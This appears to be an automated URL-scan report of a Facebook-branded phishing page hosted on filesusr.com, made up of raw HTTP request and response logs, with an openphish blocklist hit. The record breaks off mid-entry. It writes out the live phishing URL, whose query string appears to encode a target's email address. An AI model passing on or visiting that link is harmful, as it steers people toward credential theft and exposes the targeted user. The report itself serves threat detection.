GET /security/hsts-pixel.gif HTTP/1.1 Host: facebook.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	URL: facebook.com/security/hsts-pixel.gif FQDN: facebook.com IP: 31.13.72.36 31.13.72.36 HTTP/2 200 OK content-type: image/gif vary: Accept-Encoding content-encoding: br x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin cross-origin-opener-policy: same-origin-allow-popups pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT x-content-type-options: nosniff x-xss-protection: 0 content-security-policy-report-only: default-src data: blob: 'self' https://.fbsbx.com 'unsafe-inline' .facebook.com 'unsafe-eval' .fbcdn.net;script-src .facebook.com .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src .fbcdn.net data: .facebook.com 'unsafe-inline';connect-src .facebook.com facebook.com .fbcdn.net wss://.facebook.com:* wss://.fbcdn.net attachment.fbsbx.com blob: .cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ .fbsbx.com;font-src data: .facebook.com .fbcdn.net .fbsbx.com;img-src .fbcdn.net .facebook.com data: https://.fbsbx.com facebook.com .cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: .oculuscdn.com;media-src .cdninstagram.com blob: .fbcdn.net .fbsbx.com www.facebook.com .facebook.com data:;frame-src .facebook.com .fbsbx.com fbsbx.com data: .fbcdn.net;worker-src blob: .facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self' https://.fbsbx.com 'unsafe-inline' .facebook.com 'unsafe-eval' .fbcdn.net;script-src .facebook.com .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src .fbcdn.net data: .facebook.com 'unsafe-inline';connect-src .facebook.com facebook.com .fbcdn.net wss://.facebook.com: wss://.fbcdn.net attachment.fbsbx.com blob: .cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ .fbsbx.com;font-src data: .facebook.com .fbcdn.net .fbsbx.com;img-src .fbcdn.net .facebook.com data: https://.fbsbx.com facebook.com .cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: .oculuscdn.com;media-src .cdninstagram.com blob: .fbcdn.net .fbsbx.com www.facebook.com .facebook.com data:;frame-src .facebook.com .fbsbx.com fbsbx.com data: .fbcdn.net;worker-src blob: .facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; x-frame-options: DENY access-control-allow-origin: strict-transport-security: max-age=15552000; includeSubDomains x-fb-debug: gGdApqHLe7O+r6NMpGnDOhByDJLB6EmSQ1Sm91Bb8vZ5dNzJ/XBeXci4VYjBWLDKYMa8k/o7OWrSillz/QhPEg== date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info ---

URL	facebookbeatrizz.filesusr.com/html/361366_ddd3079eb13b048ee9de3517a759b9aa.html?546067*yw5pbmhhymfuyw5pbmhhodnaag90bwfpbc5jb20=
IP	34.102.176.152 (United States)
ASN	#15169 GOOGLE
UserAgent	Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed	2022-09-29 08:36:14 UTC
Status	Loading report..
IDS alerts	0
Blocklist alert	1
urlquery alerts	No alerts detected
Tags	None

Request	Response
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: a382476d14b6ae14003333e7acdfbbd9ae8775d4c1a7d5c31116f33987043cff 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "A382476D14B6AE14003333E7ACDFBBD9AE8775D4C1A7D5C31116F33987043CFF" Last-Modified: Thu, 29 Sep 2022 00:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=14205 Expires: Thu, 29 Sep 2022 12:32:48 GMT Date: Thu, 29 Sep 2022 08:36:03 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 6dd4587c98aef98ad0939030a6976a7f Sha1: 92dc5966ac2deb0c3ac7fdd02bf8d28f9239801e Sha256: a382476d14b6ae14003333e7acdfbbd9ae8775d4c1a7d5c31116f33987043cff
GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: firefox.settings.services.mozilla.com/v1/ FQDN: firefox.settings.services.mozilla.com IP: 143.204.55.35 HASH: a2427848ba35575dda8a82cf88f104978234c05389deebc3fc8279d9075eff45 143.204.55.35 HTTP/1.1 200 OK Content-Type: application/json Content-Length: 939 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Backoff, Content-Length, Retry-After Cache-Control: max-age=3600 Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Date: Thu, 29 Sep 2022 08:05:09 GMT X-Content-Type-Options: nosniff X-Cache: Hit from cloudfront Via: 1.1 83a23d85c009b0c0e3626072e9f997fe.cloudfront.net (CloudFront) X-Amz-Cf-Pop: OSL50-C1 X-Amz-Cf-Id: ASXdFesFb-0_6BnI2dtMczR-CoHXRxMgqFtKgXZXL8Hl8pSVxI3NaA== Age: 1854 --- Additional Info --- Magic: JSON data\012- , ASCII text, with very long lines (939), with no line terminators Size: 939 Md5: 1b3053fa528e28810f8a2cc9284cc921 Sha1: cca9eb471d941881a6b9a1793aecb6c281908f6a Sha256: a2427848ba35575dda8a82cf88f104978234c05389deebc3fc8279d9075eff45
GET /html/361366_ddd3079eb13b048ee9de3517a759b9aa.html?546067yw5pbmhhymfuyw5pbmhhodnaag90bwfpbc5jb20= HTTP/1.1 Host: facebookbeatrizz.filesusr.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1	URL: facebookbeatrizz.filesusr.com/html/361366_ddd3079eb13b0 (...) FQDN: facebookbeatrizz.filesusr.com IP: 34.102.176.152 HASH: 17ea2caa5ff53391faf7744fe077e35497f8bc4a7166bdc8d4d0953f35bacf97 34.102.176.152 HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: openresty/1.21.4.1 Date: Thu, 29 Sep 2022 08:36:03 GMT Content-Length: 116344 X-GUploader-UploadID: ADPycds2tdGjPm3Z_uCIsQZuDwhU84Jan_MFKX75CH0m_IzECe3KQDRCtiIBkPrvic9hPYvEmuymN2jCEK5vGl_1VwGTHQ x-goog-generation: 1664262433135850 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 116344 x-goog-hash: crc32c=zBSb9Q==, md5=3dMHnrE7BI7p3jUXp1m5qg== x-goog-storage-class: STANDARD Accept-Ranges: bytes Expires: Thu, 29 Sep 2022 09:30:50 GMT Cache-Control: public, max-age=15552000, immutable Age: 313 Last-Modified: Tue, 27 Sep 2022 07:07:13 GMT ETag: "ddd3079eb13b048ee9de3517a759b9aa" Access-Control-Allow-Origin: * Timing-Allow-Origin: * X-Seen-By: gcp.us-central-1.media-router-765d45dbd8-cqjsp Via: 1.1 google --- Additional Info --- Magic: HTML document, ASCII text, with very long lines (64635) Size: 116344 Md5: ddd3079eb13b048ee9de3517a759b9aa Sha1: 4dbabcd6814ea3b1f5ac71b80c6f9c3a4b3cf660 Sha256: 17ea2caa5ff53391faf7744fe077e35497f8bc4a7166bdc8d4d0953f35bacf97 Alerts: Blocklists: - openphish: Facebook, Inc.
GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1 Host: content-signature-2.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	URL: content-signature-2.cdn.mozilla.net/chains/remote-setti (...) FQDN: content-signature-2.cdn.mozilla.net IP: 143.204.55.110 HASH: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770 143.204.55.110 HTTP/2 200 OK content-type: binary/octet-stream content-length: 5348 last-modified: Sat, 10 Sep 2022 18:47:45 GMT content-disposition: attachment accept-ranges: bytes server: AmazonS3 date: Thu, 29 Sep 2022 05:28:28 GMT etag: "6113f8408c59aebe188d6af273b90743" x-cache: Hit from cloudfront via: 1.1 c9f2a4d2bcd548d1a3cbe1617a22f216.cloudfront.net (CloudFront) x-amz-cf-pop: OSL50-C1 x-amz-cf-id: T4lB7dcxKdGFcCREvCuJXKU4DZPGojEwr3FROxZURYg4AKser5N60g== age: 11256 X-Firefox-Spdy: h2 --- Additional Info --- Magic: PEM certificate\012- , ASCII text Size: 5348 Md5: 6113f8408c59aebe188d6af273b90743 Sha1: 7398873bf00f99944eaa77ad3ebc0d43c23dba6b Sha256: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
GET /v1/tiles HTTP/1.1 Host: contile.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: contile.services.mozilla.com/v1/tiles FQDN: contile.services.mozilla.com IP: 34.117.237.239 HASH: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3 34.117.237.239 HTTP/2 200 OK content-type: application/json server: nginx date: Thu, 29 Sep 2022 08:36:03 GMT content-length: 12 strict-transport-security: max-age=31536000 via: 1.1 google alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JSON data\012- , ASCII text, with no line terminators Size: 12 Md5: 23e88fb7b99543fb33315b29b1fad9d6 Sha1: a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 5380 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:03 GMT Last-Modified: Thu, 29 Sep 2022 07:06:23 GMT Server: ECS (ska/F708) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 366fbb58b56c6469840359066ae0ef4b Sha1: 519ec2d019a3df15e1555ee7e9f784207f3ee604 Sha256: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 5343 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:03 GMT Last-Modified: Thu, 29 Sep 2022 07:07:00 GMT Server: ECS (ska/F718) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 366fbb58b56c6469840359066ae0ef4b Sha1: 519ec2d019a3df15e1555ee7e9f784207f3ee604 Sha256: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2536 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:03 GMT Last-Modified: Thu, 29 Sep 2022 07:53:47 GMT Server: ECS (ska/F70E) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 366fbb58b56c6469840359066ae0ef4b Sha1: 519ec2d019a3df15e1555ee7e9f784207f3ee604 Sha256: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 5380 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:03 GMT Last-Modified: Thu, 29 Sep 2022 07:06:23 GMT Server: ECS (ska/F708) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 366fbb58b56c6469840359066ae0ef4b Sha1: 519ec2d019a3df15e1555ee7e9f784207f3ee604 Sha256: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 5343 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:03 GMT Last-Modified: Thu, 29 Sep 2022 07:07:00 GMT Server: ECS (ska/F718) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 366fbb58b56c6469840359066ae0ef4b Sha1: 519ec2d019a3df15e1555ee7e9f784207f3ee604 Sha256: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4
GET /rsrc.php/v3/yJ/l/0,cross/655dsu3Q_r6.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	URL: static.xx.fbcdn.net/rsrc.php/v3/yJ/l/0,cross/655dsu3Q_r (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: 2333af858ca62f59955d40969949dde6e11b0740c5af5cabcf1b2aade248f073 31.13.72.12 HTTP/2 200 OK content-type: text/css; charset=utf-8 vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Tue, 19 Sep 2023 08:43:34 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: tjTW07s/ntpIdnMM51yHzA== x-fb-debug: f2yBu/XkFJ7CGkfQlFPtaK8Zf8IpC5rXFsYgEkYpaAcm2r2Go7Jx1pEEFtgGMefs/5i0E4SRNv5WDpbzQceWdA== content-length: 3698 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:03 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (6914) Size: 3698 Md5: b634d6d3bb3f9eda4876730ce75c87cc Sha1: 06a8adb7f8c1f4b0b90e20ad24898b61c565d817 Sha256: 2333af858ca62f59955d40969949dde6e11b0740c5af5cabcf1b2aade248f073
GET /rsrc.php/v3/ye/l/0,cross/aQyKILs0gyc.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	URL: static.xx.fbcdn.net/rsrc.php/v3/ye/l/0,cross/aQyKILs0gy (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: 95ae00d129fa333f17396918bfe08176e16a0db9851210775a4baba6627abc87 31.13.72.12 HTTP/2 200 OK content-type: text/css; charset=utf-8 vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Sun, 17 Sep 2023 04:43:50 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: m03uu7wsbUsd7uyOx/Ffhw== x-fb-debug: 8bszUVsjGmOA8n8xkYF1uMeDdKPvK3npSQs73Repc4cfoNe7WAwW/u+LuqGdLA1B13wjNcBb3wqKDQNqunvFhA== content-length: 9685 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:03 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (6645) Size: 9685 Md5: 9b4deebbbc2c6d4b1deeec8ec7f15f87 Sha1: ebcd39e5cddb7d7c0380c5632b000d2d1cd6d09b Sha256: 95ae00d129fa333f17396918bfe08176e16a0db9851210775a4baba6627abc87
GET /rsrc.php/v3/yH/l/0,cross/IKa1x_hP-dA.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/IKa1x_hP-d (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: d3cd2c06a85f5eedd4a707b2ab27d0e3fff6cc5de4e6e5fc2cf8730afcc65b4a 31.13.72.12 HTTP/2 200 OK content-type: text/css; charset=utf-8 vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Sun, 17 Sep 2023 04:43:50 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: DEakO6TynjPlDtRgc3Gq2g== x-fb-debug: XTVpBrWQ1QTmbfTwB5pcZEUUeid4pQAIT8uvg8mnoV4fGGwhRjueQaHF80yx1Me+sP6RoN8ej+0S5WDufNwD2A== priority: u=3,i content-length: 9715 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:03 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (7518) Size: 9715 Md5: 0c46a43ba4f29e33e50ed4607371aada Sha1: e0059698049cac23e124e5adb13189f1db4b3dbb Sha256: d3cd2c06a85f5eedd4a707b2ab27d0e3fff6cc5de4e6e5fc2cf8730afcc65b4a
GET /rsrc.php/v3/yF/r/sAcaU2FJdDD.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	URL: static.xx.fbcdn.net/rsrc.php/v3/yF/r/sAcaU2FJdDD.js?_nc (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 31.13.72.12 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: SIplx9G7rYmkQDzZXRJtXjfX8NbUnY1LLd5kk5yyWiHtV8bE2jnaoa6sIFbuaApA1kLKBD49PM2+pecwUH/5Dw== content-length: 0 priority: u=3,i x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:03 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2536 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:03 GMT Last-Modified: Thu, 29 Sep 2022 07:53:47 GMT Server: ECS (ska/F70E) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 366fbb58b56c6469840359066ae0ef4b Sha1: 519ec2d019a3df15e1555ee7e9f784207f3ee604 Sha256: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: firefox.settings.services.mozilla.com/v1/buckets/main/c (...) FQDN: firefox.settings.services.mozilla.com IP: 143.204.55.35 HASH: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300 143.204.55.35 HTTP/1.1 200 OK Content-Type: application/json Content-Length: 329 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff Date: Thu, 29 Sep 2022 08:29:33 GMT Cache-Control: max-age=3600, max-age=3600 Expires: Thu, 29 Sep 2022 08:40:37 GMT ETag: "1648230346554" X-Cache: Hit from cloudfront Via: 1.1 8e6dce34fd223e0c9d89fd938d1784a2.cloudfront.net (CloudFront) X-Amz-Cf-Pop: OSL50-C1 X-Amz-Cf-Id: ootVtRV_iXV4OD4k9RJ8bb8S_4lTtjWnWXTrJobiyt6s7jJyju75Dw== Age: 391 --- Additional Info --- Magic: JSON data\012- , ASCII text, with very long lines (329), with no line terminators Size: 329 Md5: 0333b0655111aa68de771adfcc4db243 Sha1: 63f295a144ac87a7c8e23417626724eeca68a7eb Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /rsrc.php/v3ivXO4/yZ/l/es_LA/wgQtNFI9dU-.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: static.xx.fbcdn.net/rsrc.php/v3ivXO4/yZ/l/es_LA/wgQtNFI (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 31.13.72.12 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 